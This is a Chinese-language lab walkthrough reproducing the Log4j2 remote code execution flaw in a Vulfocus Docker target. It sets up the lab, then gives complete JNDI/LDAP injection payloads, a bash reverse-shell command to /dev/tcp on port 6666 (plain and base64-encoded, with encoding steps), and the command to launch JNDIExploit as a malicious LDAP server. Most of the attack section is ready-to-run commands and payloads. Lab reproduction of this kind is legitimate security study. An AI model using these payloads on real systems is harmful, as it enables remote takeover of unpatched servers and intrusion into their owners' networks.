2022年10月18日3年前 解答 搭建靶场 sudo docker pull vulfocus/log4j2-rce-2021-12-09 sudo docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 这里我直接kali拉取这个靶场,然后访问端口38080/hellohttp://image.g3et.cn/image_1639560929634.png 2、漏洞复现 (1)抓包http://image.g3et.cn/image_1639561069927.png (2)构造payload 这是我的payload payload=${jndi:ldap://192.168.226.131:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252BJiAvZGV2L3RjcC8xOTIuMTY4LjIyNi4xMzEvNjY2NiAwPiYx} payload=${jndi:ldap://192.168.0.104:1389/TomcatBypass/Command/Base64/bash -i >& /dev/tcp/192.168.0.104/6666 0>&1} bash -i >& /dev/tcp/192.168.0.104/6666 0>&1 这段要进行一次base64编码,然后两次url编码 (3)开启一个JNDI恶意服务 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip 这里填kali的Ip) http://image.g3et.cn/image_1639561278244.png (4)反弹shellhttp://image.g3et.cn/image_1639561301913.png (5)设置好payload点击发送即可反弹shellhttp://image.g3et.cn/image_1639561350563.png
创建帐户或登录后发表意见